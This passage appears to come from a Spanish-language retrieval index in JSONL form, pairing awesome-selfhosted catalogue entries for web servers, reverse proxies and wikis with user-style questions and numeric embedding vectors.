-0.04628, 0.03022, 0.07614, -0.01697, -0.00804, -0.01297, 0.03645, -0.09004, -0.05076, 0.06211, -0.01055, -0.0264, 0.03947, 0.04683, 0.01684, -0.02656, -0.00191, 0.08193, -0.06548, -0.04292, -0.07245, -0.05003, -0.04501, -0.00138, -0.09842, -0.03161, -0.03906, -0.00295, 0.01067, -0.03207, 0.01772, -0.02106, 0.03267, -0.03111, 0.01345, 0.09984, -0.01379, -0.03355, -0.0002, 0.09154, -0.05873, 0.00387, -0.04843, -0.01338, -0.02338, 0.00048, 0.01613, 0.00722, 0.03909, -0.01681, -0.02589, 0.02238, -0.08497, -0.04997, 0.01716, -0.04977, -0.01561, 0.00156, -0.00713, -0.01517, -0.039, -0.05326, -0.02733, 0.00521, -0.0219, 0.02111, -0.01073, -0.02819, 0.01708, -0.04522, -0.05425, -0.04836, -0.0438, -0.02668, -0.07042, -0.00383, -0.02612, 0.0535, 0.02646]} +{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Lighttpd β€” Secure, fast, compliant, and very flexible web server that has been optimized for high-performance environments [BSD-3-Clause, C/deb/Docker]. Nginx Proxy Manager β€” Docker container for managing Nginx proxy hosts with a simple, powerful interface [MIT, Docker]. NGINX β€” HTTP and reverse proxy server, mail proxy server, and generic TCP/UDP proxy server [BSD-2-Clause, C/deb/Docker]. Pangolin β€” Identity-aware tunneled reverse proxy with dashboard UI, access control, and WireGuard-based tunnels (alternative to Cloudflare Tunnel, Tailscale) [AGPL-3.0, Docker]. Pomerium β€” Identity-aware reverse proxy, successor to now obsolete oauth_proxy. It inserts an OAuth step before proxying your request to the backend, so that you can safely expose your self-hosted websites to public Internet [Apache-2.0, Go/Docker]. SafeLine β€” Web application firewall / reverse proxy to protect your web apps from attacks and exploits [GPL-3.0, Docker].", "indexar": "ΒΏcon quΓ© puedo montar una interfaz sencilla para gestionar proxies Nginx usando Docker?", "v": [-0.07632, 0.07866, -0.14615, -0.04966, 0.00146, -0.06196, -0.0082, 0.01184, -0.18459, -0.09161, -0.00151, -0.00984, 0.00573, -0.13997, -0.00012, -0.01742, 0.11503, -0.12634, -0.0442, -0.00639, -0.03634, 0.00737, -0.05097, -0.19674, 0.02268, -0.03936, 0.06661, -0.13782, -0.10772, -0.07113, -0.03017, -0.05193, 0.14277, 0.05895, -0.11647, -0.07414, 0.02647, 0.061, 0.17451, 0.02527, 0.03018, -0.02109, -0.12228, 0.06481, 0.09511, -0.00288, -0.01394, -0.09853, -0.02018, 0.03672, -0.00111, -0.10683, -0.06224, 0.03463, -0.07101, -0.10139, 0.07261, -0.13016, 0.09048, 0.01455, 0.00838, 0.09344, -0.01782, 0.08813, 0.01465, -0.13929, -0.03366, 0.05674, -0.05603, 0.02097, -0.00155, 0.0233, 0.04382, 0.02656, 0.05287, 0.05669, 0.02942, -0.01183, 0.11697, 0.09346, 0.0239, 0.0285, -0.06945, 0.06129, 0.03466, 0.02566, -0.04876, -0.11684, 0.00347, -0.0156, 0.03843, -0.02916, -0.00179, -0.17104, 0.11291, -0.08188, -0.00683, 0.12445, -0.04269, -0.03579, -0.02864, 0.04516, -0.15453, 0.18014, -0.04579, -0.06238, 0.06021, -0.06646, -0.07638, -0.05979, 0.03322, 0.0032, -0.10873, -0.03581, -0.0596, 0.02597, -0.01914, 0.04256, -0.06214, -0.03857, 0.00385, 0.01606, 0.02317, 0.09002, 0.08256, -0.02257, 0.10595, 0.1717, 0.01568, -0.01498, 0.00603, -0.09383, -0.01626, -0.09503, -0.03933, 0.08389, 0.00656, -0.07909, -0.02568, -0.07924, -0.0025, 0.02979, -0.02538, -0.02385, -0.00353, 0.09091, 0.07939, -0.03765, 0.04245, 0.056, 0.15722, -0.0604, 0.0315, 0.00025, -0.01455, -0.05564, 0.0679, -0.00552, -0.04069, 0.02351, -0.01157, -0.04655, -0.04063, 0.01876, 0.02544, -0.06395, -0.0848, 0.01342, 0.00633, 0.03529, -0.00938, 0.02802, 0.06387, -0.00723, 0.04223, 0.00603, 0.01883, -0.06044, 0.00655, -0.01409, 0.04234, -0.00133, 0.04402, 0.03084, -0.02603, -0.03255, -0.00395, 0.09571, -0.0744, 0.02131, -0.02159, 0.10726, 0.0558, -0.05825, 0.11276, -0.04191, 0.05662, -0.02244, -0.05965, 0.01992, 0.04128, -0.04282, 0.04613, 0.01526, 0.04239, 0.03301, -0.0496, 0.07545, 0.04097, 0.01921, 0.00281, 0.07674, 0.02438, -0.01159, -0.02018, 0.00731, 0.02207, 0.04549, 0.01149, -0.03357, -0.05607, 0.01643, 0.04746, -0.00314, 0.01258, 0.02051, -0.02659, 0.04321, -0.00894, 0.02346, 0.005, 0.01111, -0.01435, 0.03144, -0.02455, -0.03256, -0.01234, 0.01083, 0.01343, 0.02047, 0.04414, 0.02653, 0.01565, -0.01127, -0.04053, -0.02487, -0.07077, 0.04467, -0.01028, -0.01853, -0.01324, 0.03503, -0.00877, 0.04317, -0.04789, -0.00247]} +{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Lighttpd β€” Secure, fast, compliant, and very flexible web server that has been optimized for high-performance environments [BSD-3-Clause, C/deb/Docker]. Nginx Proxy Manager β€” Docker container for managing Nginx proxy hosts with a simple, powerful interface [MIT, Docker]. NGINX β€” HTTP and reverse proxy server, mail proxy server, and generic TCP/UDP proxy server [BSD-2-Clause, C/deb/Docker]. Pangolin β€” Identity-aware tunneled reverse proxy with dashboard UI, access control, and WireGuard-based tunnels (alternative to Cloudflare Tunnel, Tailscale) [AGPL-3.0, Docker]. Pomerium β€” Identity-aware reverse proxy, successor to now obsolete oauth_proxy. It inserts an OAuth step before proxying your request to the backend, so that you can safely expose your self-hosted websites to public Internet [Apache-2.0, Go/Docker]. SafeLine β€” Web application firewall / reverse proxy to protect your web apps from attacks and exploits [GPL-3.0, Docker].", "indexar": "ΒΏquΓ© herramienta sirve como firewall de aplicaciones web o proxy inverso para proteger mis sitios alojados en casa?", "v": [-0.03219, 0.04965, -0.10636, -0.15815, 0.03198, -0.10233, -0.02463, -0.07073, -0.03945, -0.02035, -0.03412, -0.05821, -0.00238, -0.0372, 0.06869, 0.00026, 0.05725, -0.06606, 0.0288, -0.0277, -0.06207, 0.01705, -0.09355, -0.08679, -0.11807, -0.00189, 0.09679, -0.01035, -0.17485, -0.03755, -0.02401, -0.01803, 0.14878, -0.00123, -0.10049, 0.00678, -0.01228, 0.04952, 0.0181, 0.04139, 0.05092, -0.03272, -0.06164, 0.04724, -0.01137, -0.01861, -0.10604, -0.10018, 0.0464, 0.0087, -0.1331, -0.23267, -0.11907, 0.04214, 0.0449, -0.0925, 0.15968, -0.16869, 0.09833, -0.05838, -0.19104, 0.00239, 0.00713, 0.01614, 0.03681, -0.15639, -0.11703, 0.05318, -0.07541, -0.00647, -0.02123, 0.04179, 0.06976, -0.01985, 0.00583, -0.05501, -0.00404, -0.01661, 0.05282, 0.02163, -0.04748, 0.00267, -0.09248, -0.02152, -0.0624, -0.09378, -0.085, -0.06251, 0.0231, -0.11927, 0.07741, 0.112, -0.07771, -0.00976, 0.01815, -0.12103, 0.08936, 0.01206, 0.02783, -0.03082, 0.0855, -0.07333, -0.05601, 0.04204, 0.01351, 0.01744, -0.03139, -0.02835, -0.07943, -0.03892, -0.00759, -0.04284, 0.01949, -0.02191, 0.05182, -0.01255, 0.0042, -0.06864, 0.14677, -0.0603, -0.07329, -0.02853, -0.08706, 0.03962, -0.01228, -0.02987, 0.01514, 0.07516, -0.0499, -0.02584, -0.04905, -0.16414, -0.11219, -0.01381, -0.07558, 0.03459, -0.00207, -0.11761, -0.03682, -0.04708, 0.10959, 0.05566, -0.02531, -0.02063, 0.05782, 0.068, 0.05798, -0.00377, -0.10114, -0.0261, -0.03848, 0.0084, -0.053, 0.03083, -0.05206, 0.00127, -0.08032, -0.10664, -0.03552, 0.05924, -0.02254, -0.00276, 0.03955, -0.0049, -0.03156, 0.03655, 0.01368, 0.02821, 0.10405, 0.04095, -0.01722, 0.10434, 0.01282, -0.12803, -0.04914, -0.05524, -0.03122, 0.03043, 0.02997, -0.10636, -0.00413, -0.04986, -0.02146, -0.01443, 0.0016, 0.01583, 0.06417, 0.00549, 0.0092, 0.09244, -0.04363, 0.02332, -0.03035, -0.00323, -0.01605, -0.00576, -0.03549, -0.09121, 0.09628, 0.02791, -0.04246, -0.09373, 0.00772, -0.00558, 0.01501, 0.09323, -0.01156, -0.03488, -0.01111, 0.08119, 0.00823, -0.00319, 0.03398, 0.06776, -0.01297, -0.04795, 0.05357, 0.03854, -0.03956, 0.04144, 0.01805, 0.05428, -0.05381, -0.01096, 0.00081, -0.00285, 0.00617, -0.02055, 0.00527, -0.00023, -0.00401, -0.04409, -0.01112, 0.02361, 0.04824, -0.03267, -0.03909, -0.0345, -0.00846, -0.02126, -0.0534, 0.05157, 0.03924, -0.0409, -0.00718, -0.06248, -0.03191, 0.01379, 0.03424, -0.03698, -0.04923, 0.01025, 0.04333, 0.0007, 0.02289, -0.01743]} +{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Static Web Server β€” Cross-platform, high-performance, and asynchronous web server for static file serving [Apache-2.0/MIT, Rust/Docker]. SWAG (Secure Web Application Gateway) β€” Nginx webserver and reverse proxy with PHP support, built-in Certbot (Let's Encrypt) client and fail2ban integration [GPL-3.0, Docker]. Traefik β€” HTTP reverse proxy and load balancer that makes deploying microservices easy [MIT, Go/Docker]. UUSEC WAF β€” Industry-leading high-performance, AI and semantic technology web application firewall and API security gateway (fork of nginx) [GPL-3.0, C/Lua/Docker]. Vinyl Cache β€” Web application accelerator/caching HTTP reverse proxy (formerly Varnish) [BSD-2-Clause, Go/deb/Docker]. Zoraxy β€” General purpose HTTP reverse proxy and forwarding tool [AGPL-3.0, Go/Docker].", "indexar": "que servidor web sirve para archivos estΓ‘ticos de forma rΓ‘pida y soporta varias plataformas?", "v": [0.09368, 0.03015, -0.17955, -0.13463, -0.0087, -0.12532, 0.12406, -0.21499, 0.0694, -0.05231, -0.11015, -0.08557, 0.09073, -0.0355, 0.03746, 0.0842, 0.17497, -0.08356, 0.02963, 0.0329, -0.00083, -0.00634, 0.01436, -0.06336, -0.03272, -0.06624, 0.06014, 0.04769, -0.19199, -0.02348, -0.04278, 0.01775, 0.05004, 0.00722, -0.03006, -0.07384, -0.02275, 0.09832, -0.11205, 0.02457, 0.02675, 0.00397, -0.04029, -0.0364, -0.02304, 0.02297, -0.01576, -0.09195, 0.0563, 0.01337, -0.05383, -0.08331, -0.11277, 0.08751, -0.11215, -0.04952, 0.10253, -0.22263, 0.05078, -0.01631, -0.13075, 0.04887, -0.01889, -0.07334, -0.04688, 0.06255, -0.05274, 0.01887, -0.08915, -0.05311, -0.00573, 0.052, 0.0922, -0.05766, 0.01361, 0.07755, -0.03002, -0.0014, -0.00701, 0.02019, 0.13192, 0.03477, -0.09868, 0.03341, -0.13264, -0.08449, -0.0185, -0.04118, 0.05884, -0.04532, 0.11895, 0.06839, -0.0565, 0.04753, -0.01032, -0.11431, 0.06862, -0.0079, 0.0069, -0.04202, 0.04652, 0.01734, -0.03643, 0.0335, -0.00429, 0.12127, 0.05785, -0.07473, -0.00333, -0.04499, 0.10973, 0.01139, 0.02664, 0.0172, -0.05483, -0.02937, 0.01584, 0.0158, 0.06526, 0.03726, -0.02154, -0.0245, 0.02072, 0.00015, 0.04692, -0.01909, 0.0339, -0.00691, 0.01506, 0.01375, 0.00242, -0.02812, -0.10772, 0.02061, -0.005, -0.00905, 0.1062, 0.0402, -0.02249, -0.08869, 0.13056, 0.03816, -0.0505, -0.01069, 0.11763, -0.01732, 0.07448, -0.08747, -0.06674, -0.02549, -0.01588, -0.01533, -0.02078, -5e-05, -0.11354, -0.04127, -0.01489, -0.10907, -0.12762, 0.08901, 0.00303, 0.04723, 0.00535, 0.07093, -0.03196, -0.03421, -0.04102, 0.07598, 0.07187, 0.04156, 0.00182, 0.076, -0.01396, -0.10375, 0.00303, 0.02208, -0.09608, -0.05454, 0.04375, 0.01493, -0.05431, -0.01863, -0.03818, 0.06341, -0.09389, -0.06512, 0.01278, -0.0376, -0.03243, 0.0536, 0.03806, 0.03336, -0.12913, 0.04074, -0.01432, -0.06062, -0.07075, 0.01041, 0.03043, -0.05138, -0.0299, -0.06167, -0.04894, -0.00844, -0.02961, 0.01767, -0.0422, -0.0005, 0.02166, 0.00567, -0.04843, -0.02756, 0.07667, -0.06674, 0.02474, -0.04088, 0.08165, -0.05331, 0.02182, -0.04143, -0.01125, 0.0049, -0.02408, 0.0212, 0.01735, 0.08462, 0.04414, -0.01146, 0.03274, -0.01645, -0.0124, 0.01857, -0.03504, -0.03324, 0.01231, -0.05064, 0.02373, -0.04976, -0.06376, -0.01563, 0.00514, 0.0486, -0.0372, -0.01882, 0.00011, -0.06548, -0.02206, -0.02256, -0.0205, -0.04944, -0.03414, 0.00648, 0.01905, 0.01047, 0.00863, 0.01107]} +{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Static Web Server β€” Cross-platform, high-performance, and asynchronous web server for static file serving [Apache-2.0/MIT, Rust/Docker]. SWAG (Secure Web Application Gateway) β€” Nginx webserver and reverse proxy with PHP support, built-in Certbot (Let's Encrypt) client and fail2ban integration [GPL-3.0, Docker]. Traefik β€” HTTP reverse proxy and load balancer that makes deploying microservices easy [MIT, Go/Docker]. UUSEC WAF β€” Industry-leading high-performance, AI and semantic technology web application firewall and API security gateway (fork of nginx) [GPL-3.0, C/Lua/Docker]. Vinyl Cache β€” Web application accelerator/caching HTTP reverse proxy (formerly Varnish) [BSD-2-Clause, Go/deb/Docker]. Zoraxy β€” General purpose HTTP reverse proxy and forwarding tool [AGPL-3.0, Go/Docker].", "indexar": "con quΓ© puedo montar un reenvΓ­o automΓ‘tico de certificados SSL y proteger las aplicaciones?", "v": [0.05732, 0.01058, -0.19269, -0.11018, -0.08333, -0.1074, -0.09123, -0.04565, -0.05091, -0.01775, -0.19548, -0.04512, 0.0916, -0.11104, 0.11985, 0.07939, 0.01763, -0.12407, -0.00383, 0.08216, 0.04396, -0.13387, -0.14853, -0.15414, 0.00319, 0.12072, 0.13123, 0.05224, -0.09548, 0.03947, 0.07176, 0.11402, 0.05153, 0.0311, -0.09273, 0.02956, -0.09776, 0.09356, -0.02279, 0.0401, 0.04549, -0.10602, 0.01148, 0.0005, -0.03193, 0.00717, 0.03304, -0.02361, -0.05287, -0.02832, -0.01521, -0.11874, -0.10666, -0.05041, -0.0908, -0.03189, 0.08013, 0.01223, 0.13071, -0.14261, -0.09504, 0.09778, -0.00681, 0.08192, 0.06448, -0.07671, -0.01489, 0.14435, -0.12998, 0.0026, 0.04034, -0.02777, 0.03643, 0.05621, 0.01996, 0.02998, -0.026, 0.0067, 0.04262, 0.09156, -0.01478, -0.01633, 0.02322, -0.02382, -0.03248, -0.0463, -0.09404, -0.00663, 0.03142, -0.07658, 0.0639, 0.058, 0.02611, -0.06895, -0.03442, -0.06013, 0.07394, -0.08517, -0.03611, 0.03794, -0.03584, 0.00449, -0.03159, 0.02158, 0.04055, 0.02693, 0.0396, -0.03704, 0.07582, -0.0617, 0.01164, -0.00686, -0.09229, -0.0521, 0.00146, 0.01099, -0.00813, -0.09273, 0.07737, 0.01388, -0.07399, -0.04602, -0.02932, 0.0333, 0.08797, 0.06136, 0.01131, 0.14703, -0.10181, -0.04991, -0.0055, -0.11966, -0.09741, -0.04388, -0.05392, 0.04675, -0.06767, -0.05898, -0.08742, 0.0529, 0.02982, 0.06596, 0.0261, 0.00206, 0.09345, 0.04578, -0.01965, -0.05666, 0.00742, -0.00436, -0.03144, 0.04012, -0.02709, 0.07714, -0.08628, -0.01851, -0.04275, -0.13771, 0.05164, 0.11721, -0.03088, -0.00187, 0.00475, 0.04876, 0.00604, 0.05041, 0.01241, -0.03015, 0.06628, 0.01476, 0.01911, 0.06181, 0.01792, -0.10137, 0.0278, -0.02534, 0.02492, -0.00253, 0.0776, -0.07161, -0.02998, -0.01114, 0.02526, 0.03488, 0.06393, -0.06385, 0.02417, -0.02371, 0.06254, 0.06792, 0.01097, 0.03022, -0.03772, 0.05118, -0.00437, -0.06322, -0.04595, -0.02894, 0.00227, -0.02088, -0.01947, -0.06093, -0.02854, -0.00694, 0.06088, 0.02074, -0.02032, 0.10939, -0.01877, 0.02428, 0.03026, -0.01421, 0.08601, 0.01119, -0.05703, -0.02665, -0.03396, 0.06703, -0.048, 0.02962, 0.02795, 0.02788, 0.025, -0.00026, 0.02221, -0.0211, -0.00784, 0.04125, 0.01081, -0.00812, -0.01531, 0.00832, -0.04709, 0.01916, 0.09257, 0.03908, -0.00404, -0.02925, -0.04729, -0.05631, 0.00243, 0.10286, -0.01328, -0.09749, -0.0396, -0.01058, -0.0578, 0.03331, -0.02209, -0.04609, -0.0173, 0.04459, -0.00642, -0.03178, -0.04014, -0.05331]} +{"tipo": "pregunta", "herramienta": "Web Servers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Web Servers", "tema": "web servers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Web Servers: Static Web Server β€” Cross-platform, high-performance, and asynchronous web server for static file serving [Apache-2.0/MIT, Rust/Docker]. SWAG (Secure Web Application Gateway) β€” Nginx webserver and reverse proxy with PHP support, built-in Certbot (Let's Encrypt) client and fail2ban integration [GPL-3.0, Docker]. Traefik β€” HTTP reverse proxy and load balancer that makes deploying microservices easy [MIT, Go/Docker]. UUSEC WAF β€” Industry-leading high-performance, AI and semantic technology web application firewall and API security gateway (fork of nginx) [GPL-3.0, C/Lua/Docker]. Vinyl Cache β€” Web application accelerator/caching HTTP reverse proxy (formerly Varnish) [BSD-2-Clause, Go/deb/Docker]. Zoraxy β€” General purpose HTTP reverse proxy and forwarding tool [AGPL-3.0, Go/Docker].", "indexar": "cuΓ‘l es una herramienta que acelere el cachΓ© de mis peticiones HTTP?", "v": [0.10841, 0.09772, -0.02952, 0.0256, 0.06226, -0.14293, -0.0196, 0.05438, 0.01715, 0.04742, -0.14393, 0.07509, -0.13059, -0.04553, 0.13666, -0.01273, 0.06745, -0.03745, 0.08167, 0.017, -0.00015, -0.03162, -0.08118, 0.0348, -0.16036, -0.05377, 0.09212, 0.04884, -0.23134, -0.06211, 0.04393, -0.01877, -0.06737, 0.11479, -0.05259, -0.03544, -0.07149, -0.00288, -0.11596, 0.05955, -0.01296, -0.03956, -0.11282, 0.04434, -0.02855, -0.04882, -0.06147, -0.02096, 0.07118, 0.02525, -0.05792, -0.10164, -0.23763, 0.0648, 0.00398, 0.01016, 0.22791, -0.12148, 0.03564, -0.1712, -0.06861, -0.03651, 0.04602, -0.03993, 0.05373, -0.03732, -0.04902, 0.00377, -0.0999, 0.06187, -0.04491, 0.01453, -0.00798, -0.04739, 0.10391, 0.01726, -0.05969, -0.04941, -0.07045, 0.05401, 0.08406, -0.00945, -0.06911, 0.03878, -0.07388, -0.03313, 0.06761, -0.05233, 0.041, -0.07538, 0.05532, 0.12857, -0.05155, 0.04502, 0.00161, -0.07082, 0.01871, -0.04775, -0.00769, -0.03027, 0.00957, 0.00333, -0.08204, 0.0117, 0.00105, 0.06125, -0.00227, -0.08733, -0.03778, -0.05365, 0.07059, 0.00622, -0.04139, 0.04952, 0.02793, 0.0667, -0.04381, -0.03195, 0.02091, -0.10418, -0.02627, -0.0555, -0.10555, -0.03156, 0.0216, -0.00925, -0.0627, 0.04362, 0.02636, -0.0442, -0.00562, -0.01091, -0.10112, 0.00261, -0.07137, 0.02355, 0.01097, -0.11823, 0.04291, 0.00133, -0.00608, 0.02074, -0.03228, -0.10295, 0.08983, -0.01036, 0.04264, -0.02696, -0.03682, -0.01944, 0.00279, -0.01695, 0.01433, 0.00158, -0.08429, 0.04697, -0.01956, -0.09341, -0.06126, 0.05597, 0.01516, -0.03875, 0.02567, 0.02867, 0.0154, -0.04396, -0.08935, 0.04172, 0.08085, -0.01803, 0.01575, 0.02899, -0.03274, -0.12373, -0.04556, -0.09279, -0.04833, -0.06186, 0.05959, -0.05984, -0.05416, -0.00911, -0.02143, 0.02508, -0.00631, -0.0504, 0.07375, -0.0516, 0.02714, 0.06173, 0.05515, 0.01136, -0.04539, 0.01453, -8e-05, 0.01066, -0.07141, -0.06167, 0.10771, -0.00673, -0.04671, -0.04096, 0.00154, -0.07358, -0.01175, 0.02883, -0.00326, -0.04871, -0.06106, 0.0254, 0.03346, -0.06646, 0.07014, -0.03412, 0.00597, 0.00683, 0.02105, 0.00777, -0.07587, -0.01837, 0.02741, 0.05827, 0.06976, -0.04136, 0.00644, 0.02938, 0.04893, 0.01322, 0.01314, 0.0068, -0.00738, 0.00147, -0.09867, -0.01483, 0.07063, 0.00999, 0.01452, -0.0501, -0.05741, -0.06393, 0.03561, 0.06471, -0.02184, -0.05818, -0.00489, -0.05385, -0.06621, 0.02386, 0.01071, -0.0999, -0.0396, 0.02206, 0.08371, -0.06424, 0.03011, -0.07476]} +{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: AmuseWiki β€” Amusewiki is based on the Emacs Muse markup, remaining mostly compatible with the original implementation. It can work as a read-only site, as a moderated wiki, or as a fully open wiki or even as a private site [GPL-1.0, Perl/Docker]. BookStack β€” Organize and store information. Stores documentation in a book like fashion [MIT, PHP/Docker]. django-wiki β€” Wiki system with complex functionality for simple integration and a superb interface. Store your knowledge with style: Use django models [GPL-3.0, Python]. docmost Community Edition β€” Collaborative wiki and documentation software (alternative to Confluence, Notion) [AGPL-3.0, Docker/Nodejs]. Documize β€” Modern Docs + Wiki software with built-in workflow, single binary executable, just bring MySQL/Percona [AGPL-3.0, Go]. Dokuwiki β€” Easy to use, lightweight, standards-compliant wiki engine with a simple syntax allowing reading the data outside the wiki. All data is stored in plain text files, therefore no database is required [GPL-2.0, PHP].", "indexar": "que programa hay para montar una wiki con interfaz sencilla y fΓ‘cil de usar?", "v": [-0.01551, 0.08184, -0.231, -0.144, -0.03241, -0.1171, -0.13283, -0.04702, -0.09589, -0.07956, -0.05012, -0.08838, -0.05619, -0.0107, 0.01303, -0.00718, 0.09768, -0.175, 0.02751, -0.05676, -0.0282, 0.06563, -0.07285, -0.07006, -0.09493, 0.03093, 0.05443, -0.12053, -0.1143, -0.07285, -0.01359, 0.09959, 0.05437, 0.006, -0.09532, -0.11893, 0.08135, -0.02067, 0.11465, -0.02855, -0.0119, -0.09641, -0.06807, 0.09337, 0.02809, 0.09818, 0.07778, -0.08062, 0.01213, -0.00137, 0.11438, -0.08245, -0.01618, 0.05898, -0.06599, -0.13958, 0.09661, -0.09631, -0.02603, 0.06383, -0.05083, 0.10597, -0.07309, 0.07417, 0.05509, -0.11134, -0.05762, 0.01801, -0.06837, 0.08257, 0.00309, -0.02237, 0.03905, 0.00863, 0.0536, 0.07687, -0.04171, -0.07369, 0.07655, 0.03872, -0.06222, -0.01453, 0.02254, 0.06682, -0.05652, -0.03804, 0.11338, -0.05026, 0.02818, -0.01351, 0.006, 0.00738, 0.05776, -0.05765, 0.092, -0.13723, 0.0794, 0.15734, 0.06433, 0.00748, 0.00786, -0.11668, -0.02645, 0.11848, -0.06992, -0.04233, 0.08268, -0.05283, -0.09136, 0.04649, 0.0808, 0.01651, -0.04503, -0.02363, -0.11634, -0.01675, 0.00469, 0.06721, -0.04383, -0.11198, -0.05369, 0.06366, -0.02199, 0.0653, 0.06302, -0.00345, 0.05933, 0.13614, -0.03551, 0.03642, -0.00748, -0.07131, -0.07777, -0.04045, -0.07778, -0.02526, -0.03168, -0.04733, 0.00449, 0.02183, 0.02955, 0.05136, -0.01905, -0.02194, -0.01745, 0.02124, 0.06812, -0.07899, -0.02245, 0.08282, 0.09659, -0.00676, 0.0092, 0.02419, -0.09219, -0.03346, 0.06901, 0.01181, -0.02114, -0.00668, -0.06708, -0.0166, -0.06977, -0.07263, 0.11193, -0.12024, -0.06162, 0.05047, 0.03024, -0.00026, -0.00031, 0.11286, 0.08029, -0.00933, 0.04436, 0.04093, -0.02797, -0.00861, -0.02071, -0.02936, -0.04063, 0.02402, 0.04217, 0.03805, -0.03338, -0.03636, -0.04456, 0.1135, -0.05382, 0.0018, -0.04319, 0.05761, -0.00782, 0.03081, 0.05025, 0.03246, -0.00525, -0.00028, -0.01399, -0.0893, 0.00424, -0.01285, 0.02538, -0.04606, 0.08231, 0.05116, -0.00399, 0.00508, 0.09329, 0.12273, 0.00414, -0.02771, 0.02737, 0.01272, 0.01616, -0.00607, -0.0042, 0.04293, 0.00987, 0.03021, -0.01704, 0.01174, 0.03841, 0.06299, 0.01428, -0.03974, -0.00359, -0.01741, -0.02273, -0.01354, 0.0008, -0.041, 0.02117, -0.03933, 0.00668, -0.00835, -0.00135, -0.00612, -0.01593, -0.053, -0.02176, 0.03395, 0.03385, -0.00599, -0.04326, 0.00438, -0.02843, 0.01717, -0.02944, -0.00547, -0.02117, -0.02248, 0.02737, -0.00313, -0.05826, 0.00299]} +{"tipo": "pregunta", "herramienta": "Wikis", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Wikis", "tema": "wikis", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Wikis: AmuseWiki β€” Amusewiki is based on the Emacs Muse markup, remaining mostly compatible with the original implementation. It can work as a read-only site, as a moderated wiki, or as a fully open wiki or even as a private site [GPL-1.0, Perl/Docker]. BookStack β€” Organize and store information. Stores documentation in a book like fashion [MIT, PHP/Docker]. django-wiki β€” Wiki system with complex functionality for simple integration and a superb interface. Store your knowledge with style: Use django models [GPL-3.0, Python]. docmost Community Edition β€” Collaborative wiki and documentation software (alternative to Confluence, Notion) [AGPL-3.0, Docker/Nodejs]. Documize β€” Modern Docs + Wiki software with built-in workflow, single binary executable, just bring MySQL/Percona [AGPL-3.0, Go]. Dokuwiki β€” Easy to use, lightweight, standards-compliant wiki engine with a simple syntax allowing reading the data outside the wiki. All data is stored in plain text files, therefore no database is required [GPL-2.0, PHP].", "indexar": "con que puedo montar un sistema de documentaciΓ³n colaborativa sin necesidad de base de datos compleja?", "v": [0.16885, 0.14346, -0.17346, -0.15297, 0.00787, -0.09956, 0.04932, 0.03902, -0.16597, -0.02669, -0.09589, -0.07856, 0.02227, -0.11669, 0.02382, 0.02022, 0.07053, -0.18803, -0.08737, -0.08759, -0.00265, -0.12464, -0.00165, -0.02436, -0.05723, 0.03845, 0.0002, -0.12414, -0.08528, 0.02601, 0.01189, 0.06703, -0.04446, 0.0839, -0.05275, 0.071, -0.11635, -0.05865, -0.02339, -0.15222, -0.06836, -0.0568, -0.05613, 0.12232, 0.02792, 0.08344, -0.06935, -0.0202, -0.05815, -0.03376, -0.06818, 0.03656, -0.1305, -0.0857, -0.05155, -0.13805, 0.15189, -0.11265, 0.07448, -0.02502, -0.02967, 0.11286, -0.06074, 0.03443, 0.05489, 0.02927, 0.05796, -0.03438, -0.02088, 0.08934, -0.02695, 0.01301, -0.03454, -0.12583, -0.02936, -0.04534, 0.07705, -0.05337, -0.01722, 0.08281, 0.0824, 0.02081, -0.05254, 0.07219, 0.02017, -0.0042, 0.09883, -0.01808, 0.10885, -0.02662, 0.06904, 0.01336, 0.01739, 0.00954, 0.14639, -0.02786, 0.01224, 0.06124, -0.02466, 0.02873, -0.10824, 0.02047, -0.03953, 0.02782, 0.02818, 0.01704, 0.07278, -0.0022, -0.0144, -0.04376, -0.00034, 0.02551, -0.01609, -0.00893, -0.0441, -0.10582, -0.01636, 0.08843, -0.06954, -0.02658, 0.07901, 0.01831, 0.00739, -0.09031, 0.06523, -0.04823, -0.02089, 0.11816, 0.06709, 0.04325, -0.01721, 0.02303, -0.09313, 0.04141, 0.10904, 0.05062, -0.09768, -0.03805, -0.03689, -0.04206, -0.02121, -0.00499, -0.02531, -0.05508, 0.04047, -0.00978, 0.08286, 0.00541, -0.05408, -0.03618, -0.01396, 0.10162, 0.02624, 0.02091, -0.08412, 0.02279, 0.13259, -0.03537, -0.00137, -0.01866, 0.03402, 0.04977, -0.06203, 0.06672, -0.01862, -0.04439, -0.0079, -0.03085, 0.04203, 0.03709, -0.02121, 0.00646, 0.05491, -0.07191, 0.06237, -0.03192, -0.08121, -0.10833, -0.0437, -0.01505, -0.03409, -0.0187, 0.02491, -0.00549, 0.01319, 0.00554, 0.01559, -0.07045, 0.03164, -0.03735, 0.05114, 0.08604, 0.04596, 0.03576, 0.03377, -0.07254, -0.02761, -0.04205, 0.0552, -0.01226, -0.03445, 0.07271, 0.00828, -0.01676, 0.00442, 0.07041, -0.02661, 0.01948, 0.08411, 0.01683, 0.03743, -0.02415, 0.02071, -0.05484, 